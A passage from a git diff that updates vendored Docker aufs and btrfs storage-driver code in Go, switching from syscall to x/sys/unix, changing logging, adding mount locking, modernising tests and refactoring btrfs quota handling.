 		if err := a.mount(id, m, mountLabel, parents); err != nil {
-			return "", err
+			return nil, err
 		}
 	}
 
 	a.pathCacheLock.Lock()
 	a.pathCache[id] = m
 	a.pathCacheLock.Unlock()
-	return m, nil
+	return containerfs.NewLocalContainerFS(m), nil
 }
 
 // Put unmounts and updates list of active mounts.
 func (a *Driver) Put(id string) error {
+	a.locker.Lock(id)
+	defer a.locker.Unlock(id)
 	a.pathCacheLock.Lock()
 	m, exists := a.pathCache[id]
 	if !exists {
@@ -425,7 +437,7 @@ func (a *Driver) Put(id string) error {
 
 	err := a.unmount(m)
 	if err != nil {
-		logrus.Debugf("Failed to unmount %s aufs: %v", id, err)
+		logger.Debugf("Failed to unmount %s aufs: %v", id, err)
 	}
 	return err
 }
@@ -485,7 +497,7 @@ func (a *Driver) DiffSize(id, parent string) (size int64, err error) {
 		return a.naiveDiff.DiffSize(id, parent)
 	}
 	// AUFS doesn't need the parent layer to calculate the diff size.
-	return directory.Size(path.Join(a.rootPath(), "diff", id))
+	return directory.Size(context.TODO(), path.Join(a.rootPath(), "diff", id))
 }
 
 // ApplyDiff extracts the changeset from the given diff into the
@@ -558,10 +570,7 @@ func (a *Driver) unmount(mountPath string) error {
 	if mounted, err := a.mounted(mountPath); err != nil || !mounted {
 		return err
 	}
-	if err := Unmount(mountPath); err != nil {
-		return err
-	}
-	return nil
+	return Unmount(mountPath)
 }
 
 func (a *Driver) mounted(mountpoint string) (bool, error) {
@@ -586,10 +595,10 @@ func (a *Driver) Cleanup() error {
 
 	for _, m := range dirs {
 		if err := a.unmount(m); err != nil {
-			logrus.Debugf("aufs error unmounting %s: %s", m, err)
+			logger.Debugf("error unmounting %s: %s", m, err)
 		}
 	}
-	return mountpk.Unmount(a.root)
+	return mountpk.RecursiveUnmount(a.root)
 }
 
 func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) {
@@ -604,9 +613,9 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro
 
 	offset := 54
 	if useDirperm() {
-		offset += len("dirperm1")
+		offset += len(",dirperm1")
 	}
-	b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel
+	b := make([]byte, unix.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel
 	bp := copy(b, fmt.Sprintf("br:%s=rw", rw))
 
 	index := 0
@@ -630,7 +639,7 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro
 	for ; index < len(ro); index++ {
 		layer := fmt.Sprintf(":%s=ro+wh", ro[index])
 		data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel)
-		if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil {
+		if err = mount("none", target, "aufs", unix.MS_REMOUNT, data); err != nil {
 			return
 		}
 	}
@@ -644,14 +653,14 @@ func useDirperm() bool {
 	enableDirpermLock.Do(func() {
 		base, err := ioutil.TempDir("", "docker-aufs-base")
 		if err != nil {
-			logrus.Errorf("error checking dirperm1: %v", err)
+			logger.Errorf("error checking dirperm1: %v", err)
 			return
 		}
 		defer os.RemoveAll(base)
 
 		union, err := ioutil.TempDir("", "docker-aufs-union")
 		if err != nil {
-			logrus.Errorf("error checking dirperm1: %v", err)
+			logger.Errorf("error checking dirperm1: %v", err)
 			return
 		}
 		defer os.RemoveAll(union)
@@ -662,7 +671,7 @@ func useDirperm() bool {
 		}
 		enableDirperm = true
 		if err := Unmount(union); err != nil {
-			logrus.Errorf("error checking dirperm1: failed to unmount %v", err)
+			logger.Errorf("error checking dirperm1: failed to unmount %v", err)
 		}
 	})
 	return enableDirperm
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
index dc3c6a392b..fdc502ba65 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
 import (
 	"crypto/sha256"
@@ -9,6 +9,7 @@ import (
 	"io/ioutil"
 	"os"
 	"path"
+	"path/filepath"
 	"sync"
 	"testing"
 
@@ -16,6 +17,8 @@ import (
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/reexec"
 	"github.com/docker/docker/pkg/stringid"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var (
@@ -39,6 +42,14 @@ func testInit(dir string, t testing.TB) graphdriver.Driver {
 	return d
 }
 
+func driverGet(d *Driver, id string, mntLabel string) (string, error) {
+	mnt, err := d.Get(id, mntLabel)
+	if err != nil {
+		return "", err
+	}
+	return mnt.Path(), nil
+}
+
 func newDriver(t testing.TB) *Driver {
 	if err := os.MkdirAll(tmp, 0755); err != nil {
 		t.Fatal(err)
@@ -56,7 +67,7 @@ func TestNewDriver(t *testing.T) {
 	d := testInit(tmp, t)
 	defer os.RemoveAll(tmp)
 	if d == nil {
-		t.Fatalf("Driver should not be nil")
+		t.Fatal("Driver should not be nil")
 	}
 }
 
@@ -147,7 +158,10 @@ func TestRemoveImage(t *testing.T) {
 
 	for _, p := range paths {
 		if _, err := os.Stat(path.Join(tmp, p, "1")); err == nil {
-			t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p)
+			t.Fatalf("Error should not be nil because dirs with id 1 should be deleted: %s", p)
+		}
+		if _, err := os.Stat(path.Join(tmp, p, "1-removing")); err == nil {
+			t.Fatalf("Error should not be nil because dirs with id 1-removing should be deleted: %s", p)
 		}
 	}
 }
@@ -165,7 +179,7 @@ func TestGetWithoutParent(t *testing.T) {
 		t.Fatal(err)
 	}
 	expected := path.Join(tmp, "diff", "1")
-	if diffPath != expected {
+	if diffPath.Path() != expected {
 		t.Fatalf("Expected path %s got %s", expected, diffPath)
 	}
 }
@@ -174,9 +188,8 @@ func TestCleanupWithNoDirs(t *testing.T) {
 	d := newDriver(t)
 	defer os.RemoveAll(tmp)
 
-	if err := d.Cleanup(); err != nil {
-		t.Fatal(err)
-	}
+	err := d.Cleanup()
+	assert.Check(t, err)
 }
 
 func TestCleanupWithDir(t *testing.T) {
@@ -196,45 +209,30 @@ func TestMountedFalseResponse(t *testing.T) {
 	d := newDriver(t)
 	defer os.RemoveAll(tmp)
 
-	if err := d.Create("1", "", nil); err != nil {
-		t.Fatal(err)
-	}
+	err := d.Create("1", "", nil)
+	assert.NilError(t, err)
 
 	response, err := d.mounted(d.getDiffPath("1"))
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if response != false {
-		t.Fatalf("Response if dir id 1 is mounted should be false")
-	}
+	assert.NilError(t, err)
+	assert.Check(t, !response)
 }
 
-func TestMountedTrueReponse(t *testing.T) {
+func TestMountedTrueResponse(t *testing.T) {
 	d := newDriver(t)
 	defer os.RemoveAll(tmp)
 	defer d.Cleanup()
 
-	if err := d.Create("1", "", nil); err != nil {
-		t.Fatal(err)
-	}
-	if err := d.Create("2", "1", nil); err != nil {
-		t.Fatal(err)
-	}
+	err := d.Create("1", "", nil)
+	assert.NilError(t, err)
+	err = d.Create("2", "1", nil)
+	assert.NilError(t, err)
 
-	_, err := d.Get("2", "")
-	if err != nil {
-		t.Fatal(err)
-	}
+	_, err = d.Get("2", "")
+	assert.NilError(t, err)
 
 	response, err := d.mounted(d.pathCache["2"])
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if response != true {
-		t.Fatalf("Response if dir id 2 is mounted should be true")
-	}
+	assert.NilError(t, err)
+	assert.Check(t, response)
 }
 
 func TestMountWithParent(t *testing.T) {
@@ -258,13 +256,13 @@ func TestMountWithParent(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if mntPath == "" {
-		t.Fatal("mntPath should not be empty string")
+	if mntPath == nil {
+		t.Fatal("mntPath should not be nil")
 	}
 
 	expected := path.Join(tmp, "mnt", "2")
-	if mntPath != expected {
-		t.Fatalf("Expected %s got %s", expected, mntPath)
+	if mntPath.Path() != expected {
+		t.Fatalf("Expected %s got %s", expected, mntPath.Path())
 	}
 }
 
@@ -289,8 +287,8 @@ func TestRemoveMountedDir(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if mntPath == "" {
-		t.Fatal("mntPath should not be empty string")
+	if mntPath == nil {
+		t.Fatal("mntPath should not be nil")
 	}
 
 	mounted, err := d.mounted(d.pathCache["2"])
@@ -299,7 +297,7 @@ func TestRemoveMountedDir(t *testing.T) {
 	}
 
 	if !mounted {
-		t.Fatalf("Dir id 2 should be mounted")
+		t.Fatal("Dir id 2 should be mounted")
 	}
 
 	if err := d.Remove("2"); err != nil {
@@ -312,7 +310,7 @@ func TestCreateWithInvalidParent(t *testing.T) {
 	defer os.RemoveAll(tmp)
 
 	if err := d.Create("1", "docker", nil); err == nil {
-		t.Fatalf("Error should not be nil with parent does not exist")
+		t.Fatal("Error should not be nil with parent does not exist")
 	}
 }
 
@@ -324,7 +322,7 @@ func TestGetDiff(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	diffPath, err := d.Get("1", "")
+	diffPath, err := driverGet(d, "1", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -346,7 +344,7 @@ func TestGetDiff(t *testing.T) {
 		t.Fatal(err)
 	}
 	if a == nil {
-		t.Fatalf("Archive should not be nil")
+		t.Fatal("Archive should not be nil")
 	}
 }
 
@@ -368,7 +366,7 @@ func TestChanges(t *testing.T) {
 		}
 	}()
 
-	mntPoint, err := d.Get("2", "")
+	mntPoint, err := driverGet(d, "2", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -407,7 +405,7 @@ func TestChanges(t *testing.T) {
 	if err := d.CreateReadWrite("3", "2", nil); err != nil {
 		t.Fatal(err)
 	}
-	mntPoint, err = d.Get("3", "")
+	mntPoint, err = driverGet(d, "3", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -453,7 +451,7 @@ func TestDiffSize(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	diffPath, err := d.Get("1", "")
+	diffPath, err := driverGet(d, "1", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -495,7 +493,7 @@ func TestChildDiffSize(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	diffPath, err := d.Get("1", "")
+	diffPath, err := driverGet(d, "1", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -569,9 +567,8 @@ func TestStatus(t *testing.T) {
 	}
 
 	status := d.Status()
-	if status == nil || len(status) == 0 {
-		t.Fatal("Status should not be nil or empty")
-	}
+	assert.Check(t, is.Len(status, 4))
+
 	rootDir := status[0]
 	dirs := status[2]
 	if rootDir[0] != "Root Dir" {
@@ -597,7 +594,7 @@ func TestApplyDiff(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	diffPath, err := d.Get("1", "")
+	diffPath, err := driverGet(d, "1", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -632,7 +629,7 @@ func TestApplyDiff(t *testing.T) {
 
 	// Ensure that the file is in the mount point for id 3
 
-	mountPoint, err := d.Get("3", "")
+	mountPoint, err := driverGet(d, "3", "")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -672,48 +669,34 @@ func testMountMoreThan42Layers(t *testing.T, mountPath string) {
 		}
 		current = hash(current)
 
-		if err := d.CreateReadWrite(current, parent, nil); err != nil {
-			t.Logf("Current layer %d", i)
-			t.Error(err)
-		}
-		point, err := d.Get(current, "")
-		if err != nil {
-			t.Logf("Current layer %d", i)
-			t.Error(err)
-		}
+		err := d.CreateReadWrite(current, parent, nil)
+		assert.NilError(t, err, "current layer %d", i)
+
+		point, err := driverGet(d, current, "")
+		assert.NilError(t, err, "current layer %d", i)
+
 		f, err := os.Create(path.Join(point, current))
-		if err != nil {
-			t.Logf("Current layer %d", i)
-			t.Error(err)
-		}
+		assert.NilError(t, err, "current layer %d", i)
 		f.Close()
 
 		if i%10 == 0 {
-			if err := os.Remove(path.Join(point, parent)); err != nil {
-				t.Logf("Current layer %d", i)
-				t.Error(err)
-			}
+			err := os.Remove(path.Join(point, parent))
+			assert.NilError(t, err, "current layer %d", i)
 			expected--
 		}
 		last = current
 	}
 
 	// Perform the actual mount for the top most image
-	point, err := d.Get(last, "")
-	if err != nil {
-		t.Error(err)
-	}
+	point, err := driverGet(d, last, "")
+	assert.NilError(t, err)
 	files, err := ioutil.ReadDir(point)
-	if err != nil {
-		t.Error(err)
-	}
-	if len(files) != expected {
-		t.Errorf("Expected %d got %d", expected, len(files))
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.Len(files, expected))
 }
 
 func TestMountMoreThan42Layers(t *testing.T) {
-	os.RemoveAll(tmpOuter)
+	defer os.RemoveAll(tmpOuter)
 	testMountMoreThan42Layers(t, tmp)
 }
 
@@ -744,10 +727,10 @@ func BenchmarkConcurrentAccess(b *testing.B) {
 	defer os.RemoveAll(tmp)
 	defer d.Cleanup()
 
-	numConcurent := 256
+	numConcurrent := 256
 	// create a bunch of ids
 	var ids []string
-	for i := 0; i < numConcurent; i++ {
+	for i := 0; i < numConcurrent; i++ {
 		ids = append(ids, stringid.GenerateNonCryptoID())
 	}
 
@@ -762,7 +745,7 @@ func BenchmarkConcurrentAccess(b *testing.B) {
 	parent := ids[1]
 	ids = append(ids[2:])
 
-	chErr := make(chan error, numConcurent)
+	chErr := make(chan error, numConcurrent)
 	var outerGroup sync.WaitGroup
 	outerGroup.Add(len(ids))
 	b.StartTimer()
@@ -800,3 +783,23 @@ func BenchmarkConcurrentAccess(b *testing.B) {
 		}
 	}
 }
+
+func TestInitStaleCleanup(t *testing.T) {
+	if err := os.MkdirAll(tmp, 0755); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	for _, d := range []string{"diff", "mnt"} {
+		if err := os.MkdirAll(filepath.Join(tmp, d, "123-removing"), 0755); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	testInit(tmp, t)
+	for _, d := range []string{"diff", "mnt"} {
+		if _, err := os.Stat(filepath.Join(tmp, d, "123-removing")); err == nil {
+			t.Fatal("cleanup failed")
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
index d2325fc46c..e60be5e3c9 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
 import (
 	"bufio"
@@ -15,7 +15,7 @@ func loadIds(root string) ([]string, error) {
 	if err != nil {
 		return nil, err
 	}
-	out := []string{}
+	var out []string
 	for _, d := range dirs {
 		if !d.IsDir() {
 			out = append(out, d.Name())
@@ -36,7 +36,7 @@ func getParentIDs(root, id string) ([]string, error) {
 	}
 	defer f.Close()
 
-	out := []string{}
+	var out []string
 	s := bufio.NewScanner(f)
 
 	for s.Scan() {
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
index da1e892f44..9f5510380c 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
@@ -1,21 +1,17 @@
 // +build linux
 
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
 import (
 	"os/exec"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 // Unmount the target specified.
 func Unmount(target string) error {
 	if err := exec.Command("auplink", target, "flush").Run(); err != nil {
-		logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err)
+		logger.WithError(err).Warnf("Couldn't run auplink before unmount %s", target)
 	}
-	if err := syscall.Unmount(target, 0); err != nil {
-		return err
-	}
-	return nil
+	return unix.Unmount(target, 0)
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
index 8062bae420..8d5ad8f32d 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
@@ -1,7 +1,7 @@
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
-import "syscall"
+import "golang.org/x/sys/unix"
 
 func mount(source string, target string, fstype string, flags uintptr, data string) error {
-	return syscall.Mount(source, target, fstype, flags, data)
+	return unix.Mount(source, target, fstype, flags, data)
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
index d030b06637..cf7f58c29e 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
 import "errors"
 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
index 44420f11a7..cac6240303 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
 
 /*
 #include <stdlib.h>
@@ -16,30 +16,31 @@ import "C"
 
 import (
 	"fmt"
+	"io/ioutil"
+	"math"
 	"os"
 	"path"
 	"path/filepath"
+	"strconv"
 	"strings"
-	"syscall"
+	"sync"
 	"unsafe"
 
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
-	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/go-units"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func init() {
 	graphdriver.Register("btrfs", Init)
 }
 
-var (
-	quotaEnabled  = false
-	userDiskQuota = false
-)
-
 type btrfsOptions struct {
 	minSpace uint64
 	size     uint64
@@ -49,7 +50,16 @@ type btrfsOptions struct {
 // An error is returned if BTRFS is not supported.
 func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
 
-	fsMagic, err := graphdriver.GetFSMagic(home)
+	// Perform feature detection on /var/lib/docker/btrfs if it's an existing directory.
+	// This covers situations where /var/lib/docker/btrfs is a mount, and on a different
+	// filesystem than /var/lib/docker.
+	// If the path does not exist, fall back to using /var/lib/docker for feature detection.
+	testdir := home
+	if _, err := os.Stat(testdir); os.IsNotExist(err) {
+		testdir = filepath.Dir(testdir)
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(testdir)
 	if err != nil {
 		return nil, err
 	}
@@ -62,26 +72,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 	if err != nil {
 		return nil, err
 	}
-	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil {
-		return nil, err
-	}
-
-	if err := mount.MakePrivate(home); err != nil {
+	if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 		return nil, err
 	}
 
-	opt, err := parseOptions(options)
+	opt, userDiskQuota, err := parseOptions(options)
 	if err != nil {
 		return nil, err
 	}
 
-	if userDiskQuota {
-		if err := subvolEnableQuota(home); err != nil {
-			return nil, err
-		}
-		quotaEnabled = true
-	}
-
 	driver := &Driver{
 		home:    home,
 		uidMaps: uidMaps,
@@ -89,39 +88,48 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		options: opt,
 	}
 
+	if userDiskQuota {
+		if err := driver.subvolEnableQuota(); err != nil {
+			return nil, err
+		}
+	}
+
 	return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil
 }
 
-func parseOptions(opt []string) (btrfsOptions, error) {
+func parseOptions(opt []string) (btrfsOptions, bool, error) {
 	var options btrfsOptions
+	userDiskQuota := false
 	for _, option := range opt {
 		key, val, err := parsers.ParseKeyValueOpt(option)
 		if err != nil {
-			return options, err
+			return options, userDiskQuota, err
 		}
 		key = strings.ToLower(key)
 		switch key {
 		case "btrfs.min_space":
 			minSpace, err := units.RAMInBytes(val)
 			if err != nil {
-				return options, err
+				return options, userDiskQuota, err
 			}
 			userDiskQuota = true
 			options.minSpace = uint64(minSpace)
 		default:
-			return options, fmt.Errorf("Unknown option %s", key)
+			return options, userDiskQuota, fmt.Errorf("Unknown option %s", key)
 		}
 	}
-	return options, nil
+	return options, userDiskQuota, nil
 }
 
 // Driver contains information about the filesystem mounted.
 type Driver struct {
 	//root of the file system
-	home    string
-	uidMaps []idtools.IDMap
-	gidMaps []idtools.IDMap
-	options btrfsOptions
+	home         string
+	uidMaps      []idtools.IDMap
+	gidMaps      []idtools.IDMap
+	options      btrfsOptions
+	quotaEnabled bool
+	once         sync.Once
 }
 
 // String prints the name of the driver (btrfs).
@@ -150,13 +158,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 
 // Cleanup unmounts the home directory.
 func (d *Driver) Cleanup() error {
-	if quotaEnabled {
-		if err := subvolDisableQuota(d.home); err != nil {
-			return err
-		}
-	}
-
-	return mount.Unmount(d.home)
+	return d.subvolDisableQuota()
 }
 
 func free(p *C.char) {
@@ -196,7 +198,7 @@ func subvolCreate(path, name string) error {
 		args.name[i] = C.char(c)
 	}
 
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error())
@@ -224,7 +226,7 @@ func subvolSnapshot(src, dest, name string) error {
 	C.set_name_btrfs_ioctl_vol_args_v2(&args, cs)
 	C.free(unsafe.Pointer(cs))
 
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error())
@@ -233,8 +235,8 @@ func subvolSnapshot(src, dest, name string) error {
 }
 
 func isSubvolume(p string) (bool, error) {
-	var bufStat syscall.Stat_t
-	if err := syscall.Lstat(p, &bufStat); err != nil {
+	var bufStat unix.Stat_t
+	if err := unix.Lstat(p, &bufStat); err != nil {
 		return false, err
 	}
 
@@ -242,7 +244,7 @@ func isSubvolume(p string) (bool, error) {
 	return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil
 }
 
-func subvolDelete(dirpath, name string) error {
+func subvolDelete(dirpath, name string, quotaEnabled bool) error {
 	dir, err := openDir(dirpath)
 	if err != nil {
 		return err
@@ -270,7 +272,7 @@ func subvolDelete(dirpath, name string) error {
 				return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err)
 			}
 			if sv {
-				if err := subvolDelete(path.Dir(p), f.Name()); err != nil {
+				if err := subvolDelete(path.Dir(p), f.Name(), quotaEnabled); err != nil {
 					return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err)
 				}
 			}
@@ -281,12 +283,27 @@ func subvolDelete(dirpath, name string) error {
 		return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err)
 	}
 
+	if quotaEnabled {
+		if qgroupid, err := subvolLookupQgroup(fullPath); err == nil {
+			var args C.struct_btrfs_ioctl_qgroup_create_args
+			args.qgroupid = C.__u64(qgroupid)
+
+			_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_CREATE,
+				uintptr(unsafe.Pointer(&args)))
+			if errno != 0 {
+				logrus.WithField("storage-driver", "btrfs").Errorf("Failed to delete btrfs qgroup %v for %s: %v", qgroupid, fullPath, errno.Error())
+			}
+		} else {
+			logrus.WithField("storage-driver", "btrfs").Errorf("Failed to lookup btrfs qgroup for %s: %v", fullPath, err.Error())
+		}
+	}
+
 	// all subvolumes have been removed
 	// now remove the one originally passed in
 	for i, c := range []byte(name) {
 		args.name[i] = C.char(c)
 	}
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error())
@@ -294,8 +311,27 @@ func subvolDelete(dirpath, name string) error {
 	return nil
 }
 
-func subvolEnableQuota(path string) error {
-	dir, err := openDir(path)
+func (d *Driver) updateQuotaStatus() {
+	d.once.Do(func() {
+		if !d.quotaEnabled {
+			// In case quotaEnabled is not set, check qgroup and update quotaEnabled as needed
+			if err := subvolQgroupStatus(d.home); err != nil {
+				// quota is still not enabled
+				return
+			}
+			d.quotaEnabled = true
+		}
+	})
+}
+
+func (d *Driver) subvolEnableQuota() error {
+	d.updateQuotaStatus()
+
+	if d.quotaEnabled {
+		return nil
+	}
+
+	dir, err := openDir(d.home)
 	if err != nil {
 		return err
 	}
@@ -303,17 +339,25 @@ func subvolEnableQuota(path string) error {
 
 	var args C.struct_btrfs_ioctl_quota_ctl_args
 	args.cmd = C.BTRFS_QUOTA_CTL_ENABLE
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error())
 	}
 
+	d.quotaEnabled = true
+
 	return nil
 }
 
-func subvolDisableQuota(path string) error {
-	dir, err := openDir(path)
+func (d *Driver) subvolDisableQuota() error {
+	d.updateQuotaStatus()
+
+	if !d.quotaEnabled {
+		return nil
+	}
+
+	dir, err := openDir(d.home)
 	if err != nil {
 		return err
 	}
@@ -321,24 +365,32 @@ func subvolDisableQuota(path string) error {
 
 	var args C.struct_btrfs_ioctl_quota_ctl_args
 	args.cmd = C.BTRFS_QUOTA_CTL_DISABLE
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error())
 	}
 
+	d.quotaEnabled = false
+
 	return nil
 }
 
-func subvolRescanQuota(path string) error {
-	dir, err := openDir(path)
+func (d *Driver) subvolRescanQuota() error {
+	d.updateQuotaStatus()
+
+	if !d.quotaEnabled {
+		return nil
+	}
+
+	dir, err := openDir(d.home)
 	if err != nil {
 		return err
 	}
 	defer closeDir(dir)
 
 	var args C.struct_btrfs_ioctl_quota_rescan_args
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error())
@@ -357,7 +409,7 @@ func subvolLimitQgroup(path string, size uint64) error {
 	var args C.struct_btrfs_ioctl_qgroup_limit_args
 	args.lim.max_referenced = C.__u64(size)
 	args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT,
 		uintptr(unsafe.Pointer(&args)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error())
@@ -366,6 +418,60 @@ func subvolLimitQgroup(path string, size uint64) error {
 	return nil
 }
 
+// subvolQgroupStatus performs a BTRFS_IOC_TREE_SEARCH on the root path
+// with search key of BTRFS_QGROUP_STATUS_KEY.
+// In case qgroup is enabled, the retuned key type will match BTRFS_QGROUP_STATUS_KEY.
+// For more details please see https://github.com/kdave/btrfs-progs/blob/v4.9/qgroup.c#L1035
+func subvolQgroupStatus(path string) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
